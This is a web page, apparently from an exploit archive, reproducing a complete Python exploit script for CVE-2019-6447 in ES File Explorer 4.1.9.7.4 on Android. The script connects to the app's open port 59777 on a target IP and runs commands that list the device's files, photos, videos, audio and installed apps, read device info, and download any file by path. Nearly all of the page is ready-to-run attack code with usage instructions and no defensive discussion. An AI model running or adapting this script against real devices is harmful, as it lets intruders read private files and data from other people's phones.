扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 |
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read # Date: 29/06/2021 # Exploit Author: Nehal Zaman # Version: ES File Explorer v4.1.9.7.4 # Tested on: Android # CVE : CVE-2019-6447 import requests import json import ast import sys if len(sys.argv) < 3: print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]") sys.exit(1) url = 'http://' + sys.argv[2] + ':59777' cmd = sys.argv[1] cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo'] listCmds = cmds[:9] if cmd not in cmds: print("[-] WRONG COMMAND!") print("Available commands : ") print("listFiles : List all Files.") print("listPics: List all Pictures.") print("listVideos: List all videos.") print("listAudios: List all audios.") print("listApps: List Applications installed.") print("listAppsSystem: List System apps.") print("listAppsPhone : List Communication related apps.") print("listAppsSdcard: List apps on the SDCard.") print("listAppsAll : List all Application.") print("getFile : Download a file.") print("getDeviceInfo : Get device info.") sys.exit(1) print("\n==================================================================") print("|ES File Explorer Open Port Vulnerability : CVE-2019-6447|") print("|Coded By : Nehal a.k.a PwnerSec |") print("==================================================================\n") header = {"Content-Type" : "application/json"} proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"} def httpPost(cmd): data = json.dumps({"command":cmd}) response = requests.post(url, headers=header, data=data) return ast.literal_eval(response.text) def parse(text, keys): for dic in text: for key in keys: print(f"{key} : {dic[key]}") print('') def do_listing(cmd): response = httpPost(cmd) if len(response) == 0: keys = [] else: keys = list(response[0].keys()) parse(response, keys) if cmd in listCmds: do_listing(cmd) elif cmd == cmds[9]: if len(sys.argv) != 4: print("[+] Include file name to download.") sys.exit(1) elif sys.argv[3][0] != '/': print("[-] You need to provide full path of the file.") sys.exit(1) else: path = sys.argv[3] print("[+] Downloading file...") response = requests.get(url + path) with open('out.dat','wb') as wf: wf.write(response.content) print("[+] Done. Saved as <code>out.dat</code>.") elif cmd == cmds[10]: response = httpPost(cmd) keys = list(response.keys()) for key in keys: print(f"{key} : {response[key]}") |
体验盒子
